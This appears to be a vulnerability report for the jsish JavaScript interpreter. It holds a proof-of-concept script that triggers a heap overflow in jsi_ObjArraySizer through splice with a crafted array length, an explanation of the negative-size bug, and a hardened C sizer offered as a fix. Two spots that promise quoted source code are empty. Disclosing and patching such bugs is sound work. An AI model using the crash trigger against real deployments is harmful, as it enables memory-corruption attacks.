operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
poc:
var o = [
1,
2
];
var JAZh = -2147483647 == -9007199254740991;
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308);
o.length = o.length != o;
var itMb = 10000 <= -2147483648;
o = o.constructor();
var QHiF = o.length < o.length;
var a = Object.keys(o);
o.length = ~-9007199254740992;
var APSB = -9007199254740990 != a.length;
o = o.splice(o.length, a.length, 9007199254740994, o, APSB, 759250124);
vulnerability description:
The code that causes the vulnerability is at src/jsiObj.c line 417, in the function jsi_ObjArraySizer; the code is as follows:
The parameter len is the length of the Array. The PoC first sets o.length to a maximum value:
Then Jsi_ObjArraySizer is called from jsi_ArraySpliceCmd. After the calculation, nsiz comes out as a negative number, which bypasses the two checks at line 421 and line 425.
The affected code is as follows: obj->arr obtains a smaller heap block through Jsi_Realloc, and then memset writes to the space pointed to by obj->arr + obj->arrMaxSize, which by this point lies beyond the actual heap range of obj->arr, causing a heap overflow.
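A hardened sizer for the pattern described in this report, added here as an example and not jsish's own code: the struct, the names (SafeArray, safe_array_sizer, safe_array_size, length_from_number) and the ARRAY_HARD_LIMIT ceiling are assumptions. It keeps the slot count in size_t so it can never turn negative, rejects lengths that are NaN, negative, fractional or above the ceiling before any arithmetic, never shrinks the block, and zeroes only the tail that realloc actually added.

```c
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical object modelled on the fields the report names; not jsish's struct. */
typedef struct {
    void  **arr;        /* element storage */
    size_t  arrMaxSize; /* slots currently allocated */
} SafeArray;

#define ARRAY_HARD_LIMIT ((size_t)1 << 24)  /* assumed ceiling: 16M slots */

/* Convert a script-side number to a length; reject NaN, negatives, fractions
 * and anything above the ceiling (in standard JS the PoC's ~-9007199254740992
 * evaluates to -1, which is refused here before it can reach the allocator). */
bool length_from_number(double d, size_t *out) {
    if (!(d >= 0.0) || d > (double)ARRAY_HARD_LIMIT)
        return false;                       /* NaN fails the first test too */
    size_t v = (size_t)d;                   /* in range, so the cast is defined */
    if ((double)v != d) return false;
    *out = v;
    return true;
}

/* Slot count with growth headroom, computed in size_t so it cannot go
 * negative; the ceiling keeps len + len/2 + 8 far from wrapping. */
static bool safe_array_size(size_t len, size_t *nsiz_out) {
    if (len > ARRAY_HARD_LIMIT) return false;
    size_t nsiz = len + len / 2 + 8;
    if (nsiz > ARRAY_HARD_LIMIT)
        nsiz = ARRAY_HARD_LIMIT;
    *nsiz_out = nsiz;
    return true;
}

/* Grow the backing store; never shrink, and zero only the added tail so the
 * memset cannot run past the block realloc returned. */
bool safe_array_sizer(SafeArray *obj, size_t len) {
    size_t nsiz;
    if (!safe_array_size(len, &nsiz))
        return false;
    if (nsiz <= obj->arrMaxSize) return true;   /* already big enough */
    void **na = realloc(obj->arr, nsiz * sizeof(void *));
    if (!na) return false;
    memset(na + obj->arrMaxSize, 0, (nsiz - obj->arrMaxSize) * sizeof(void *));
    obj->arr = na;
    obj->arrMaxSize = nsiz;
    return true;
}
```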